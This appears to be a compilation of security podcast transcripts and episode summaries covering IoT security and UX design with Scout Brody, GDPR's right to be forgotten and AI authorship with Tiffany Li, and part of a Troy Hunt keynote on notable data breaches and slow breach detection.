What we did was we got actually some monitoring hardware in place so we can actually look at the traffic and look at the specific content, payload that is sent. And sure enough, classic DDoS attack by analyzing the garbage coming over. So, I always encourage companies, if you are having problems, number one, contact your ISP. They can do some analysis. If you may have to go above and beyond that if the problem keeps happening... We eventually had to change everything that we did, unfortunately from our website, or our host, our ISP. We have a dedicated server now with hardware at the server. We have hardware here before our firewall as well. Again, layers of security, that starts to minimize all the problems. And ironically, we actually receive a lot more DDoS attacks now than we ever did, but we're actually blocking them, that's the good news.
Andy Green: Actually, your servers are on premises and...or you're using them...?
Scott Schober: It's not here physically in our building, but we have a dedicated server, as opposed to most companies, it's usually shared. What starts to happen is you start to now inherit some of the problems that others on your server have. And sometimes the hackers use that as backdoor to have access to you, by getting through what the other guys have. So better to just have a dedicated server, pay the extra money.
Andy Green: Okay, that's right.
With data as the new oil, we’ve seen how different companies responded. From meeting new data privacy compliance obligations to combining multiple data anonymized points to reveal an individual’s identity – it all speaks to how companies are leveraging data as a business strategy. Consumers and companies alike are awakening to data’s possibilities and we’re only beginning to understand the psyche and power of data.
Tool of the Week: Zorp
Panelists: Cindy Ng, Kilian Englert, Mike Buckbee
By now, we’ve all seen the wildly popular internet of things devices flourish in pop culture, holding much promise and potential for improving our lives. One aspect that we haven’t seen are IoT devices that not connected to the internet.
In our follow-up discussion, this was the vision Simply Secure's executive director Scout Brody advocates, as current IoT devices don’t have a strong foundation in security.
She points out that we should consider why putting a full internet stack on a new IoT device will help an actual user as well as the benefits of bringing design thinking when creating IoT devices.
Scout Brody: Yes, you know, I like to say, when I'm talking to friends and family about the internet, there are a lot of really interesting, shiny-looking gadgets out there. But as someone who has a background in doing computer security, and also someone who has a background in developing production software in the tech industry, I'm very wary of devices that might live in my home and be connected to the internet. I should say, low power devices, or smaller devices, IoT devices that might be connected to the internet.
And that's because the landscape of security is so underdeveloped. We think about where...I like to draw a parallel between the Internet of Things today and desktop computers in the mid-90s. When desktop computers started going online in the 90s, we had all sorts of problems because the operating systems and the applications that ran on those machines were not designed to be networked. They were not designed, ultimately, with a threat model that involved an attacker trying to probe them constantly in an automated fashion from all directions. And it took the software industry, you know, a couple of decades, really, to get up to speed and to really harden those systems and craft them in a way that they would be resilient to attackers.
And I think that based on the botnet activity that we've seen in just the past year, it's really obvious that a lot of the IoT systems that are around the internet full-time today, are not hardened in the way that they need to be to be resilient against automated attacks. And I think that with IoT systems, it's even scarier than a desktop, or a laptop, or a mobile phone because of the sort of inevitable progression toward intimacy of devices.
We look at the history of computing. We started out with these mainframe devices or these massive god awful things that lived in the basement of the great universities in this country. And we progressed from those devices through mainframes and, you know, industry through personal computers and now the mobile phones. With each step, these devices have become more integrated into our lives. They have access to more of our personal data and have become ever more important to our sort of daily existence. And IoT really takes us to the next step. It brings these devices not just into our home, but into our kitchens and into our bathrooms, and into our bedrooms, and our living rooms with our children. And the data they have access to is really, frankly, scary. And the idea of exposing that data, exposing that level of intimacy, intimate interaction with our lives, to the internet without the hardening that it deserves, is just really scary. So, that's, you know, a bit of a soapbox, but I'm just very cautious about bringing such devices into my home.
However, I see some benefits. I mean, there are certainly...I think that a lot of the devices that are being marketed today with computer smarts in them are, frankly, ridiculous. There are ways that we could, sort of, try and mediate their access or mediate a hacker's access to them, such that they were a little less scary. One way to do that is, as you mentioned, and as we discussed before, to not have them be just online. You know, have things be networked via less powerful protocols like Bluetooth low energy, or something like that. That poses challenges when it comes to updating software or having, you know, firmware or software on a device, or having a device being able to communicate to the outside world. If we want to be able to turn our light bulb on the back porch on from our phone when we're 100 miles away, it's difficult. More difficult if the light bulb is only really connected to the rest of our house by Bluetooth, but it's still possible. And I think that's something that we need to explore.
Cindy Ng: Do you think that's where design comes in where, okay, well, now we've created all these IoT devices and we haven't incorporated privacy and security methodologies and concepts in it, but can we...it sounds like we're scrambling to fix things...are we able to bring design thinking, a terminology that's often used in that space, into fixing and improving how we're connecting the device with the data with security and privacy?
Scout Brody: I think so. I mean, I think what's happening today...the sort of, our environment we're in now, people are saying, "Oh, I'm supposed to have smart devices. I want to ship smart devices and sell smart devices because this is a new market. And so, what I'm going to do is, I'm going to take my thermostat, and also my television, and also my light bulb, and also my refrigerator, and also my washer-dryer, and I'm going to just put a full internet stack in them and I'm going to throw them out on the big, bad, internet." Without really stopping to think, what are the needs that actual people have in networking these devices? Like, what are the things that people actually want to be able to do with these devices? How is putting these devices online going to actually improve the lives of the people who buy them? How can we take these devices and make their increased functionality more than just a sales pitch gimmick and really turn this into something that's useful, and usable, and advances their experience?
And I think that we, frankly, need more user research into IoT. We need to understand better what are the needs that people have in their real lives. Say, you want to make a smart fridge. How many people, you know, would benefit from a smart fridge? What are the ways that they would benefit? Who are the people that would benefit? What would that really look like? And based on the actual need, then try and figure out how to...and here's where we sort of switched the security perspective, how do I minimize access? How do I minimize the damage that can be done if this machine is attacked while still meeting the needs that the humans actually have? Is there a way to provide the functionality that I actually know that humans want, that the human people need, without just throwing it on the internet willy-nilly.
And I think the challenge there is that, you know, we're in an environment where IoT devices...that the environment is very competitive and everyone is trying to do, sort of, the early mover trying to get their device on the market as soon as possible. We see a lot of startups. We see a lot of companies that don't have any security people. I know we have, sort of, one or two designers who don't have the opportunity to really go in and do research and understand the actual needs of users. And I think, unfortunately, that's backwards. And until that gets rectified, and you see companies both exploring what it is that people actually will benefit from, and how to provide that in a way that minimizes access, I think that I will continue to be pretty skeptical about putting such devices in my own home.
Cindy Ng: And, so we've spent some time talking about design concepts, and security, and merging them together. How can someone get started? How do they start looking for a UX designer? Is that something that Simply Secure, the nonprofit that you're a part of, can you help in any way?
Scout Brody: Yeah. So, that is actually, kind of, exactly what Simply Secure has set out to do as a nonprofit organization. You know, we recognize that it's important to have this partnership between design and security in order to come up with products that actually meet the needs of people while also keeping them secure and keeping their data protected. And so, Simply Secure works both in a sort of information sharing capacity. We try to, sort of, build a sense of community among designers who are interested in security and privacy topics as well as developers and security folks who are interested in learning more about design. We try to be sort of a community resource. We, on our blog, and our very small but slowly growing GitHub repository, try to share resources that both designers and software developers can use to try and explore and expand their understanding at the intersection of security and design.
We actually, as an organization, do ourselves what we call open research and consulting. And the idea here is that an organization, and it can be any organization, either a small nonprofit consortium organization, in which case, you know, we work with them potentially pro bono. Or, a large for-profit tech company, or a startup, in which case we would, you know, try to figure out some sort of consulting arrangement. But we work with these organizations to help them go through a design process that is simultaneously integrated with their security and privacy process as well. And since we are a nonprofit, we don't just do, sort of, traditional consulting where we go in, do UX research and then come out, you know, with a design that will help the company. We also go through a process of open sourcing that research in such a way that it will benefit the community as a whole. And so the idea here is that by engaging with us, and sort of working with us to come up with a design or research problem...a problem that an organization is having with their software project, they will not only be solving their problem but also be contributing to the community and the advancements of this work as a whole.
With the spring just a few short weeks away, it’s a good time to clean the bedroom windows, dust off the ceiling fans, and discard old security notions that have been taking up valuable mind space.
What do you replace those security concepts with?
How about ones that say that security systems are not binary “on-off” concepts, but instead can be seen as a gentle gradient. And where user experiences developed by researchers create security products that actually, um, work. This new world is conceived by Scout Brody, executive director of Simply Secure, a nonprofit dedicated to leveraging user interface design to make security easier and more intuitive to use.
“UX design is a critical part of any system, including security systems that are only meant to be used by highly technical expert users,” according to Brody. “ So if you have a system that helps monitor network traffic, if it’s not usable by the people who are designed to use it or it’s designed for, then it’s not actually going to help them do their jobs.”
In the first part of my interview with Scout Brody, we cover why security systems aren’t binary, the value of user interface designers, and how to cross pollinate user personas with threat models.
The cornerstone of your work, Scout, you say consumers abdicate their security and privacy for ease, convenience and because sometimes they're strong-armed to yielding all their personal information in order to download an app or use a piece of technology because that's how technology is being developed. And the way you describe how security and privacy technologies are being developed, that they're not binary concepts but gradient, and can you elaborate more on what that means?
Scout Brody: Well, Cindy, I think that as a security professional in our field we tend to think of things in absolutes and we tend to be constantly striving for the ideal. So if you're an I.T. professional working in a corporate environment, you are trying to do your utmost to make the settings as secure as it possibly can be because that's how you define success as a security professional. When it comes to thinking about security for end-users however, it's important to recognize that not everyone has the same definition of what security they need to meet their needs or what privacy means to them.
So one good example might be that you have, say you know a government worker who lives in Washington, D.C., and is very concerned they might have what we call in the security business, a particular threat model or they're worried about those people accessing their information, for professional purposes. They might be concerned about organized crime or foreign governments or all sorts of different things. And that's a very different threat model than someone who is a stay-at-home dad in Minnesota for example, who you know may not have those same concerns when he's going and posting adorable photos of his kids on Facebook, that that information might be compromised or used to hurt him or his professional life in any way.
So I think this notion that there is no one definition of what is secure but I like to talk about usability and design as being gradient in the same way that security is. So in security, although we tend to think of it as an absolute, when we get down to the practice of security, and we very rarely say "Oh, this system is secure." No, we say "This system is secure against threats A, B and C," it's secure in the face of a particular threat model. And similarly when you talk about a system being usable or useful to end-users, we have to say, "This is usable and useful to these users in these contexts."
Cindy Ng: I like what you mentioned about threat model and context. Can you provide us an example of how you would align a threat model alongside with the technology you have, what would that look like?
Scout Brody: Well, I think that it depends, I think I want to clarify that when you say design, we're talking not just about a system architecture design but we're really talking about the design of the entire piece of software, including the user-interface or as you like to say in the design side, the user experience or U.X. And a U.X. design, I maintain, is a critical part of any system, including security systems, even security systems that are really only meant to be used by highly technical expert users. So if you have an I.T. system that helps monitor network traffic, if it's not usable by the people who are designed to use it or that it's designed for, then it's not going to actually help them do their job, it's not actually going to be successful as a piece of software.
Re-emphasizing that design doesn't just mean architecture design, it may mean design also of the user experience. And I think it's really important when we're looking at the software design process to consider a partnership between the user experience designer and the software designer, including the security expert. So I think that it's important to look at the user experience from a security perspective and to look at the security from a user experience perspective, and that's one of the reasons that we advocate a deep partnership between security folks and user experience folks. That they collaborate on the design of the system from the beginning, but they try to understand one another's priorities and concerns and that they try and sort of use one another's language to talk about those priorities for the system.
Cindy Ng: And when you talk about U.X. design and then design in general, what is the business value of a designer and why is that partnership so critical? Because these days anyone can install Illustrator or Photoshop and start drawing or creating or you can submit a request online for any kind of artwork to be created and within 24 hours, 48 hours you get what you requested. What's the difference between the kind of design I'm talking about versus a partnership?
Scout Brody: Well my favorite analogy when talking to security folks about the importance of, you know, high quality in-house design, is to talk about cryptanalysis or cryptographic protocol design. We do not expect that a designer, a user experience designer or even an average sort of lay person software developer will be able to develop a secure cryptographic protocol. We don't say, "Oh but you know what, I have a terminal window, I've got a text editor, I can write my own cryptographic protocol, I understand prime numbers, I understand, like, the concept of factoring, so therefore I am totally qualified to write a cryptographic protocol." No.
We also don't say, "Oh well but there are freelance people on the internet that I can hire to write my cryptographic protocols for me, so I'm just gonna, you know, outsource this on this site here, I need a protocol that allows me to change it in this way under these parameters, "Hey freelance cryptographer that I met on the internet, that I found on a freelance website, can you design this for me?" No, absolutely not. And why is that? It's because we recognize the value of the expertise that goes into designing a cryptographic protocol. We recognize that there are deep concerns, deep nuances that come to bear when a cryptographic protocol is put into place. There are ways in which it can break that are very hard to predict unless you have a lot of background in designing and analyzing these protocols.
Although it's not quite as extreme when you look at U.X. design because there are certainly I guess probably more qualified U.X. designers out there than there are truly qualified cryptographic, you know, cryptographers. It is an important analogy to draw because we don't expect designers to do cryptography, why do we expect cryptographers or software developers in general to do design? I think that there is that sort of assumption that anyone can do design, anyone can pop open Illustrator and then come out with a user experience that is going to be workable. Or the expectation that you can just hire sort of a freelancer to come in and work for a two week sprint and put something out for your product, really underestimates the importance of the user experience design to the success of your product.
I think that you look at all of the ways in which systems fail, security systems in particular, because security's way of talking about this is, "Oh humans are the weakest link." And I say, "No, it's not that humans are the weakest link, it's that the user interface that you have created or the human policies that you have put in place are broken." And that they're not taking the human system into account in the way that you need to. And that's exactly what U.X. designers can help you do, is understand. U.X. designers and researchers, can help you understand the users that are going to be using your system and help you can put in place interfaces and human processes that will allow them to be successful in using your system.
Cindy Ng: You mentioned in a previous conversation we had about U.X. designers developing user personas, can you talk a little bit about why they're used in creating a product you might be building?
Scout Brody: Yeah, so user personas are a handy sort of reference that is created out of a user experience research process. So the idea is that ideally, you know, U.X. designers or researchers have the opportunity to go and spend some quality time talking to people who would ideally be users of the system that's being designed. So if you're designing a system for system administrators like I mentioned earlier, to do network analysis, you know, ideally you'd have the opportunity to go and actually talk to these people. You know, go see them in their workplace, experience the challenges that they face, the things that they're concerned about, the tools that they use today, what they like about them and what they don't like about them. And ideally you would have the opportunity to talk to a great variety of folks who do these things.
And on the upside of this research process, you would have all of this data about the various different people you talk to. And you go through a sort of informal clustering process to try and capture that data in a succinct way that the user experience designers can then move forward with their design, bearing all of that information in mind. And that sort of abstraction is called a user persona. The idea is that talk to 20 different system administrators from around the globe and you come out with four or five different user personas that sort of reflect the needs and challenges that those users face.
So you might have a user persona named Annabelle, and Annabelle is a very experienced system administrator who is overworked because she has too many meetings and gets too many emails and too many notifications, and is really looking for a system that will help her sort of cut through all of the noise and really identify the important signals. And then you might have a user persona named Jim, and Jim is a more junior system administrator who has the time to really go through and read all every single email notifications and understand what it means, things like that, and really wants to be able to have lots of detail at his fingertips. So these are two distinct sort of personalities that are based in the actual user research that you did that help inform your design and end up allowing you to have sort of a shorthand to bear in mind each of these different users' needs as you're going through the process of designing your system.
One really interesting and compelling idea that I've come across for the past couple of years is the notion of using user personas instead of cross-pollinating them with threat model. And the idea here is, okay you are a user experience designer and you have these different user personas that you're using to try and design a system that will work for a great diversity of users, can you also consider the possibility of having user personas for your potential attackers? So if you are working in partnership with your security professional who is working on a project, can you say, "Okay what are the threats that we think are facing our software?"
Okay, we expect that there is going to be an attacker who is sort of a script kiddie persona. That there is going to be an attacker who is a nation state actor. We expect there is going to be a criminal, you know, organized crime attacker. And what are the different capabilities of these attackers and what is our system going to do, both at the architecture level and at the user experience level, to try and be resilient to these things? And I think it's a sort of interesting way of bringing the expertise and the structure from the two different domains, security and user experience, and working together to highlight the needs and vulnerabilities of a piece of software you're trying to develop and process.
The combination of business and technology-related challenges and the requirement to meet regulatory compliance obligations as well as managing risk is no easy feat. European officials have been disseminating information on how to prevent online scams, general tips as well as warning signs. Other attorneys have been reflecting on legislative developments to prepare for the year ahead. Meanwhile, businesses like Facebook and Reddit are finding their rhythm as they dance between running their business, meeting compliance requirements and keeping their users’ data safe and secure.
Tiffany C. Li is an attorney and Resident Fellow at Yale Law School’s Information Society Project. She frequently writes and speaks on the privacy implications of artificial intelligence, virtual reality, and other technologies. Our discussion is based on her recent paper on the difficulties with getting AI to forget. In this second part, we continue our discussion of GDPR and privacy, and then explore some cutting edge areas of law and technology. Can AI algorithms own their creative efforts? Listen and learn.
But what's missing often is someone who actually knows what that means on the technical end. For example, all the issues that I just brought up are not in that room with the lawyers and policymakers really, unless you bring in someone with a tech background, someone who works on these issues and actually knows what's going on. So this is something that's not just an issue with the right to be forgotten or just with EU privacy law, but really any technology law or policy issue. I think that we definitely need to bridge that gap between technologists and policymakers.
One option is giving it to the designer of the AI system on the theory that they created a system which is the main impetus for the work being generated in the first place. Another theory is that the person actually running the system, the person who literally flipped the switch and hit run should own the rights because they were provided the creative spark behind the art or the creative work. So other theories prevail or exists right now. Some people say that there should be no rights to any of the work because it doesn't make sense to provide rights who are not the actual creators of the work. Others say that we should try to figure out a system for giving the AI the work. And this of course is problematic because AI can't own anything. And even if it could, even if we get the world where AI is a sentient being, we don't really know what they want. We can't pay them. We don't know how they would prefer to be incentivized for their creation, and so on. So a lot of these different theories don't perfectly match up with reality.
But I think the prevailing ideas right now are either to create a contractual basis for figuring this out. For example, when you design your system, you signed a contract with whoever you sell it to, that lays out all the rights neatly in the contract so you bypass a legal issue entirely. Or think of it as a work-for-hire model. Think of the AI system as now just an employee who is simply following the instructions of an employer. In that sense for example, if you are an employee of Google and you develop something, you develop a really great product, you don't own the product, Google owns that product, right? It's under the work-for-hire model. So that's one theory.
And what my research is finding is that none of these theories really makes sense because we're missing one crucial thing. And I think the crucial point they're missing is really goes back to the very beginnings of why we have copyright in the first place, or why we have intellectual property, which is that we want to incentivize the creation of more useful work. We want more artists, we want more musicians, and so on. So the key question then if you look at works created by non-humans isn't, you know, if we can contractually get around this issue, the key question is what we want to incentivize. Whether we want to incentivize work in general, art in general, or if for some reason we think that there's something unique about human creation, that we want humans to continually be creating things, and those two different paradigms I think should be the way we look at this issue in the future. So it's a little high level but I think that that's interesting distinction that we haven't paid enough attention to yet when we think about the question of who should own intellectual properties for works that are created AI and non-humans generally.
So in my personal opinion, I believe if we do get to that point, if there are artificially intelligent beings who are as intelligent as humans, who we believe to be almost exactly the same as humans in every way in terms of having intelligence, being able to mimic or feel emotion, and so on, we should definitely look into expanding our definition of citizenship and fundamental rights. I think, of course, there is the opposite view, which is that there is something inherently unique about humanity and there's something unique about life as we see it right now, biological, carbon based life as we see it right now. But I think that's a limited view and I think that that limited view is not something that really serves us well if you consider the universe as a whole and the large expanse of time outside of just these few millennia that humans have been on this earth.
And this is something that, you know, maybe is giving too much moral responsibility to the day to day actions of most people. But if you consider that any small action within a company can affect the product, and any product can then affect all the users that it reaches, you kind of see this easy scaling up of your one action to effect on the people around you, which can then affect maybe even larger areas and possibly the world. Which is not to say, of course, that we should live in fear of having to the decide every single aspect of our lives based on greater impact the world. But I do think it's important to remember that especially if you are in a role in which you're dealing with things that might have really direct impact on things that matter, like privacy, like free speech, like global idealistic human rights values, and so on.
I think it's important to consider ethics and technology definitely. And if we can provide training, if we can make this part of the product design process, if we can make this part of what we expect when hiring people, sure. I think it would be great. Adding it to curriculum, adding tech or information ethics course into the general computer science curriculum for example would be great. I also think that it would be great to have a tech course for the law school curriculum as well. Definitely both sides can learn from each other. We do in general just need to bridge that gap.
These tech companies and their responsibilities or their duties, towards users, towards movements, towards governments, and possibly towards the world and larger ideals. So it's a really interesting new initiative and I would definitely welcome different feedback and ideas on these topics. So if people want to check out more information, you can head to our website. It's law.yale.edu/isp. And you can also follow me on twitter @Tiffany, T-I-F-F-A-N-Y-C-L-I. So I would love to hear from any of your listeners and love to chat more about all of these fascinating issues.
On the last week of the year, the Inside Out Security panelists reflected on the year’s biggest breaches, scams and fake everything. And is computer security warfare? Well, it depends on who you ask. A 7th grader trying to change her grades isn’t an enemy combatant. But keep in mind as another argues, “There's an opponent who doesn't care about you, doesn't play by the rules, and wants to screw you as fully as possible.”
Panelists: Cindy Ng, Mike Buckbee, Kilian Englert, Kris Keyser
Tiffany C. Li is an attorney and Resident Fellow at Yale Law School’s Information Society Project. She frequently writes and speaks on the privacy implications of artificial intelligence, virtual reality, and other technologies. Our discussion is based on her recent paper on the difficulties with getting AI to forget. In this first part , we talk about the GDPR's "right to be forgotten" rule and the gap between technology and the law.
The right to be forgotten, it's a core principle in the GDPR, where a consumer can request to have their personal data be removed from the internet. And I was wondering if you can speak to the tension between an individual's right to privacy and a company's business interest.
So one argument outside of this consumer versus business tension, one argument really is simply that the right to be forgotten goes against the values of speech and expression, because by requesting that your information or information about you be taken down, you are in some ways silencing someone else's speech.
And I think what's interesting really is that even then people were already discussing this tension that we mentioned before. Both the tension between consumer rights and business interests but also the tension between privacy in general and expression and transparency. So it goes all the way back to 2010, and we're still dealing with the ramifications of that decision now.
And of course, the right to be forgotten has many conditions on it and it's not an ultimate right without, you know, anything protecting all these values we discussed. But I think it should be mentioned that there are consequences, and if we take anything to an extreme, the consequences become, well, extreme.
I think another issue, if we take a step back, if we think about machine learning algorithms and artificial intelligence, you consider any personal information as part of the training data that is used to train an AI system. If your personal information, for example, if you committed a crime and the fact of that crime and your personal information are linked to that crime, and put into an algorithm that determines the likelihood of any human being to become a criminal. So after adding in your data, that AI system then has a slight bias towards believing that people who may be similar to your various data points may be more likely to commit a crime, by a very slight bias. So when that happens, after that, if you request for your data to be removed from the system, we get into kind of a quandary. If we just remove the data record, there's a possibility of affecting the entire system because the training data that the algorithm was trained on is crucial to the development of the algorithm and the development of the AI system.
The CIO is responsible for using IT to make the business more efficient. Meanwhile, the CISO is responsible for developing and executing a security program that’s aimed to protect enterprise systems and data from both internal and external threats. At the end of the day, the CISO makes security recommendations to the CIO has the final say. Perhaps it’s time that the CISO gets a seat at the table.
Meanwhile, good Samaritans such as Chris Vickery and Troy Hunt help companies find leaked data and hopes the company seal the leak before cybercriminals find it.
Other articles discussed:
Panelists: Cindy Ng, Kilian Englert, Mike Buckbee, Matt Radolec
We need to do better. Exhausting. Dramatic. That’s how the Inside Out Security panelists described our 2018 security landscape. We see the drama unfold weekly on our show and this week was no different.
As facial recognition software becomes more prevalent, we’re seeing it used in security to protect even the biggest stars like Taylor Swift. Her security team set up a kiosk replaying rehearsal highlights. Meanwhile, onlookers who stopped were cross checked against their database of stalkers. What a stealthy way to protect one of our favorite singers in the world!
And here’s a story that’s less wholesome. A few years ago, we thought it was a major threat when ransomware gained prominence. Cybercriminals upped the ante and threatened victims with a note that someone planted bombs in the building unless a bitcoin ransom is paid.
Kris is right, we do need to do better. Kilian is right, it’s all exhausting.
Tool of the Week: BloodHoundAD
Panelists: Cindy Ng, Kilian Englert, Mike Buckbee, Kris Keyser
Other articles discussed:
There’s a yin and yang to technology. For instance, the exchange for convenience and ease with our data. Unfortunately Facebook is getting most of the blame, when many companies have collect many points of data as the default setting.
Meanwhile, as quickly as diligent security pros are eager to adopt and advance security solutions with biometrics, cybercriminals are equally determined to thwart these efforts.
Other articles discussed:
• Google’s plan to mitigate bias in their algorithm
• Australia approves bill, requiring tech companies to provide data upon request
We’ve completed almost 100 podcast panels and sometimes it feels like we’re talking in circles. Over the years, the security and privacy landscape have gotten more complex, making baseline knowledge amongst industry pros ever so more important. Old concepts are often refreshed into current foundational security concepts.
Technological advancements as well as decline also bring forth new challenges. When there’s a decline, we need to reserve the right to change our strategy. For years, users were blamed and labeled as the enemy, but our infrastructure wasn’t built with security in mind. So, perhaps the weakest link in cybersecurity isn't human, but the infrastructure.
When there are advancements, security and privacy need to be baked in from the very beginning. Concerns are already arising with DNA and fitness testing kits as well as what constant surveillance is doing to our brains.
Other articles discussed:
Passwords are easy to use. Everyone knows how it works. However, many security pros point out the inherent design flaw in passwords as a safe form of authorization and authentication. The good news is that we can reflect upon what old technologies can teach new technologies as we’re creating new products and services. One vital concern to keep in mind are terms and conditions, particularly with DNA ownership rights.
Other articles discussed:
Troy Hunt, creator of “Have I been pwned”, gives a virtual keynote that explores how security threats are evolving - and what we need to be especially conscious of in the modern era.
In this keynote, you’ll learn:
and much more!
Troy Hunt: So, let's move on and talk a little bit detection because this is another interesting thing where we're seeing adversaries within environments, or data breaches having occurred, and then long periods of time passing before anyone realizes what's going wrong. And I think probably one of the most canonical examples of long lead time for detection is Sony Pictures.
So, if everyone remembers Sony Pictures, so this was back in about 2014. Folks came into the office one day, sat down at their PC and got, this is what appeared on the screen. Hacked by GOP, Guardians of Peace. Evidently not so peaceful. And then you can see a whole bunch of hyperlinks down at the bottom as well. And this was Sony's data. And the data that was leaked was massively extensive. So, the attackers claimed that they'd been in the network for a year and taken about 100 terabytes of data.
I've not seen anything to verify it was quite that long or quite that much, but what we do know is that there was a huge amount of data taken. So, things like unreleased films, sensitive internal emails, some of those emails caused a huge amount of embarrassment because they were disparaging towards Obama, which wasn't a great move. Also, things like employee data with social security numbers and they're kind of important in the U.S.
And one of the things that I find really fascinating about those three different classes of data, the unreleased films, sensitive internal emails, and employee data is that it's not like these are just all sitting on a shared folder somewhere. They're not there in one location. These are the sorts of assets, particularly in a large organization, like Sony Pictures, which would have been distributed into very, very different corners of the organization. So, it's from all over the place. And someone's had enough time to go and retrieve very large amounts of data from different locations within the network, exfiltrate them, and then eventually upload them to those locations.
So, this was really devastating. And it's really interesting now to look at just how much stuff is exposed in organizations which causes things like this. So, I'll give you a bit of an example here. Varonis produced a report earlier this year, ''The 2018 Global Data Risk Report''. And they found that 21% of all folders in an organization are open to everyone. So, if you're in a corporate environment, just have a look around you, like have a look at just how much stuff is open. I spent a lot of years in a corporate environment. And I would see this all the time, folders that were open to everyone. And why do people do it? Well, because it's easy. They're taking the shortcuts. Fifty-eight percent of those have over 100,000 folders open to everyone. A hundred thousand folders that are open to everyone.
Now, obviously, these are large organizations. And of course the larger organization, the harder it is to manage this sort of stuff as well. But that is just a staggeringly high number. So, I remember back in my corporate role, some of you know where that was, I would find these open folders. And I'd go to my leadership and I'll say, ''Look, we've got a lot of open folders. Like we've got to stop doing this. This is going to work out badly.'' And the fix was always to secure the folder. And what this ultimately was, it was always just treating the symptom. It's like, ''Hey, we found something. It's been open, let's close it.'' And I would drive and drive and drive to say, ''Look, there is an underlying root cause which is causing these folders to be opened in the first place.''
And then what it boiled down to was a whole bunch of people having the ability to open them in the first place that shouldn't have. A whole bunch of people had server admin rights to places they shouldn't have. And those are harder problems to solve. But if your only means of detection is some bloke having a browse around the network in spare time and finding too much stuff open, well, then that's probably not a good place to be in. So, we're saying way too much stuff, way too open, for way too long.
So, time and time again in running ''Have I Been Pwned'', I find that I'm the vector by which organizations learn of a data breach. And this shouldn't be the way. Very often, this is very large amounts of data as well. This can be many tens of gigabytes worth of data that someone had sent me. And I've got to go to the organization say, ''Hey look, I've got your data. I think this is yours. You should do something with it.'' I'm in the middle of about half a dozen disclosures right now. And one of them is tens of gigabytes with the log files. And those log files include things like emails. Some of them are disparaging. I'll leave it at that. I'm not quite sure how this will pan out yet. But Troy Hunt should not be your disclosure. This is not the way you want it to work.
So, these organizations really need to do a better job at the ability to detect when data is flying out of their networks in abnormal ways. And if we go back and have a look at some of the really notable recent incidents, you can see just how much data we're talking about. So, LinkedIn is a good example. So, often when I do talks, I talk about ''Have I Been Pwned.'' And I'll ask the audience, ''So, say who was in LinkedIn?" And there's always, "I hate the people in LinkedIn'' because there are 165 million records there, including mine, unfortunately.
Now, the thing is their data breach happened in 2012. And back in 2012, they did actually acknowledge it. They said, ''Look, we've, we've had a cyber thing, we don't think it's too bad.'' I think at the time, they thought it might've been something like 5 million records, not too bad. And then four years passed, so for four years, someone had all this data. SHA-1 hashed passwords too. So, pretty trivial to crack those.
In fact, I was speaking to someone at an event just yesterday in Sydney and they said, ''Look, they'd gone through and managed to crack about 98% of them." So, for all intents and purposes that cryptographic storage was absolutely useless. So, four years between incident and detection. Dropbox, another popular one a lot of people have been in including me. And again, the same sort of time frames. So, the incident happened in 2012. It took four years before they realized what actually happened and just how bad it was.
In fact, as I understand it, and bear with me here, the way the Dropbox data breach went down was Dropbox employees storing a backup of Dropbox data in their Dropbox and then their Dropbox got broken into. It's all very meta. But apparently, that was what happened. But four years before we learned about the incident. Another one. Also another one that I was in. This is not an intentional thing, I've just been on a lot of data breaches.
Disqus. So, someone reached out to me last year and said, ''Look, I've got the Disqus data. There's about 18 million records in here.'' And I had a look at it and it looked very legitimate. And then I found my own data. And incidentally, finding your own data in a data breach makes verification a lot easier.
Actually, my number one blog post ever is titled ''The Dropbox hack is real.'' And it was number one I think because I managed to get verification out there very early. And the way I verified it is that I had one password, generated password. So, it's just like 40 or 50 crazy random characters. And there was a bcrypt hash in the database. And when I passed in that crazy random string of password, it matched, go go, there we go. So, good.
So, Disqus looked legitimate and I had to reach out to them. And that was the first they knew of it. They said, ''Look, you know, we weren't aware of any incident, certainly not an incident dating back three years.'' And they verified it. And then had to go through the disclosure process. And again, like these organizations, your organization, you really don't want to get emails from me. It's not a good day usually.
Imgur was the last one as well. So, Imgur was like last year as well. Slightly after Disqus and very, very similar sorts of time frame. Now, fortunately, there are only 1.7 million records. And I think that that was only that small because it dated back to a point which was pretty early for that. So, they managed to sort of dodge a bit of a bullet. But, you know, even still, four years passing from an almost 2 million records being breached to when they actually realize it.
So, clearly, we've got a problem with detection. And I think that's really, really sort of worthwhile everyone thinking about. If you did have malicious activity happened within your internal network or within your website, would you actually be able to identify anomalous behavior? And would you be able to identify it or is the first you're going to know about it when you get an email from me?
So, moving on, the money pit is an interesting one. Now, this is kind of a little bit delicate. Because there's obviously a lot of companies out there selling a lot of security things. And the trick that organizations have today is they are just absolutely bombarded by messaging.
If any of you have been to any of the big security shows, particularly something like RSA in San Francisco, it's just absolute bedlam with security companies everywhere selling cyber things. And it's very, very hard. In fact, I'm very sympathetic to organizations who are trying to make decisions about, how are we going to protect our company? Because everywhere they look there is a cyber-something. And I'll give you a few examples of this. There are cyber enablement services. You can go and buy cyber-enablement. There are cyber innovation services. That's also a thing here. You can go and buy cyber innovation services. There are even cyber matrix services. You can buy into the cyber matrix. Not quite sure what it is, but it is out there.
And just to make the point that they are actually all genuine services that are out there. Have a Google for them. There are 27,000 cyber enablement results out there. Fifty-two thousand cyber innovation. And if we go all the way down to matrix there's going on 44,000 cyber matrix results. And you might be looking at this going, where on earth do they get these terms from? Like is this something they just make up? It's not really something I made up, but it's something you can make up. Because every one of these came out of the bullshit generator.
There is literally a website. You can see the URL up there on the top right. And I know that everyone now wants to go there because it's actually really cool. So, you go there and you can make bullshit. And what it does is it combines a verb, an adjective, and a noun. And all I did is, I just went and took a bunch of those and added them after cyber and we got the results we saw before.
So, that's actually kind of cool. So, you just go through and you make new terms, repurpose interactive readiness, I can barely even say that one. You go through and streamline next-generation functionalities. This is a real service. Give this to your marketing people, they will love it. It will drive you nuts but they'll love it. And like this was meant to be a little bit tongue in cheek, but the very fact that I could go here and generate terms of the actual things that people are selling sort of demonstrates the point of how difficult it is for those actually having to make decisions about where they spend their cyber dollar.
So, moving on, let's just wrap up a few takeaways here from what we've just looked at and then we'll go through and do some questions. So, thinking back to the conventional risks, we still have the same fundamental underlying problems today as we did many, many years ago. We've also got a whole bunch of new ones as well. And particularly thinking about conventional risk, things like risks in the humans are still massive. We've really not put much of a dent in phishing attacks. You know, a great example, we've still got this conventional vulnerability, which is the organic matter sitting at the keyboard, and we haven't been able to solve it yet. The monetization side of things as well.
So, many of the old monetization strategies still apply today. They've just been streamlined because we've got cryptocurrency and email and internet, which we didn't have when these things started out. And of course, monetization also goes all the way through to the organizations that are...I was going to say defending against these attacks. I'm not sure if that's a fair representation of professional data recovery, but certainly playing in that ecosystem.
